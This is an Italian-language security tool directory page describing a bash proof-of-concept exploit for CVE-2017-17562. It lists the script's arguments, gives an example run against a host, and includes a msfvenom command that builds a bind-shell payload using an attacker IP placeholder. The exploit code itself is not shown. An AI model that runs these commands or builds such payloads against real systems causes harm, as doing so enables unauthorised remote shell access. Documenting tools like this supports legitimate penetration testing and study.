Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
bash-CVE-2017-17562 — PoC per CVE-2017-17562 scritto in bash | Kitploit
Strumenti/GitHubGitHub/joaomagfreitas/bash-cve-2017-17562
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneArchived
GitHubjoaomagfreitas/bash-cve-2017-17562

bash-CVE-2017-17562

PoC per CVE-2017-17562 scritto in bash

Vedi Repository
14 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

bash-CVE-2017-17562

Un'implementazione PoC in Bash per CVE-2017-17562.

Richiede curl per creare richieste HTTP.

Basato sulle implementazioni di Metasploit e @fssecur3.

Arguments

The following arguments need to be set as they are required for reconnaissance + payload send:

root@kitploit:~
$1: IP/Host of remote vulnerable machine being attacked
$2: Port of remote machine webserver
$4: Path to crafted payload being sent to vulnerable machine

Opzionalmente, è possibile impostare anche i seguenti argomenti:

root@kitploit:~
$3: If the web server is running under a TLS/SSL tunnel. Defaults to no
$5: Path to list of known vulnerable CGI endpoints, to be used in reconnaissance phase. Defaults to "cgi.endpoints"

Example

root@kitploit:~
bash exploit.bash 192.168.1.1 80 yes payload.so cgi.endpoints

Disclaimer

Il presente codice è solo a scopo di apprendimento e dimostrazione. Non deve essere utilizzato su target per i quali non si ha autorizzazione.

Nessun payload è fornito in questo repository. Tuttavia, qualsiasi binario compatibile con l'architettura del sistema operativo target dovrebbe funzionare. Per creare un payload di bind shell, puoi usare msfvenon:

root@kitploit:~
msfvenom -a <instruction_set> --platform <os> -p generic/shell_bind_tcp LHOST=<attacker_ip_address> LPORT=<target_bind_port> -f elf-so -o payload.so
Scarica lo strumento